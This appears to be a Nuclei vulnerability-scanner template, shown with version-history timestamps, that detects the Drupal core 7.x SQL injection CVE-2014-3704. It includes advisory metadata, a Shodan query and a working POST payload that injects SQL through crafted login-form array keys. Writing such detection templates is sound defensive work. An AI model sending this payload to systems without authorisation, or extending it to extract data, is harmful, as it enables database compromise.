2021-04-07 12:22:53 +00:00
id : CVE-2014-3704
2022-04-22 10:38:41 +00:00
2021-04-07 12:22:53 +00:00
info :
2022-02-25 14:32:23 +00:00
name : Drupal SQL Injection
2021-04-07 12:22:53 +00:00
author : princechaddha
severity : high
2022-02-25 14:32:23 +00:00
description : The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing specially crafted keys.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the Drupal application and its underlying database.
2023-09-06 13:22:34 +00:00
remediation : Upgrade to Drupal core 7.32 or later.
2021-08-18 11:37:49 +00:00
reference :
2022-02-25 14:32:23 +00:00
- https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2014-10-15/sa-core-2014-005-drupal-core-sql
- https://nvd.nist.gov/vuln/detail/CVE-2014-3704
2021-04-22 09:02:19 +00:00
- https://www.drupal.org/SA-CORE-2014-005
2022-05-17 09:18:12 +00:00
- https://www.exploit-db.com/exploits/34984
- https://www.exploit-db.com/exploits/34992
- https://www.exploit-db.com/exploits/34993
- https://www.exploit-db.com/exploits/35150
2022-02-25 14:32:23 +00:00
classification :
2022-09-06 01:33:31 +00:00
cvss-metrics : CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
2023-04-18 02:40:53 +00:00
cvss-score : 7.5
2022-02-25 14:32:23 +00:00
cve-id : CVE-2014-3704
2022-09-06 01:33:31 +00:00
cwe-id : CWE-89
2024-01-14 13:49:27 +00:00
epss-score : 0.97537
epss-percentile : 0.99994
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*
2022-07-07 06:45:55 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : drupal
product : drupal
2023-09-06 13:22:34 +00:00
shodan-query : http.component:"drupal"
2024-01-14 09:21:50 +00:00
tags : cve2014,cve,edb,drupal,sqli
2022-06-30 03:43:06 +00:00
variables :
num : "999999999"
2023-04-27 04:28:59 +00:00
http :
2021-04-07 12:22:53 +00:00
- method : POST
path :
- "{{BaseURL}}/?q=node&destination=node"
2023-07-11 19:49:27 +00:00
2022-06-30 03:43:06 +00:00
body : 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5({{num}})),1)%23]=bob&name[0]=a'
2021-04-07 12:22:53 +00:00
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2021-04-07 12:22:53 +00:00
words :
- "PDOException"
2022-06-30 03:43:06 +00:00
- '{{md5({{num}})}}'
2021-04-07 12:22:53 +00:00
condition : and
2022-02-25 14:32:23 +00:00
2022-06-30 03:43:06 +00:00
- type : status
status :
- 500
2024-01-26 08:31:11 +00:00
# digest: 4a0a00473045022100eb3a2126592b46c62f772197d72ab5179bc61f2ad644dd96062a822cb373480f02204118f118160b84105f139acfa90dae616993e20101d1fcca5c572f30068d9baf:922c64590222798bb761d5b6d8e72950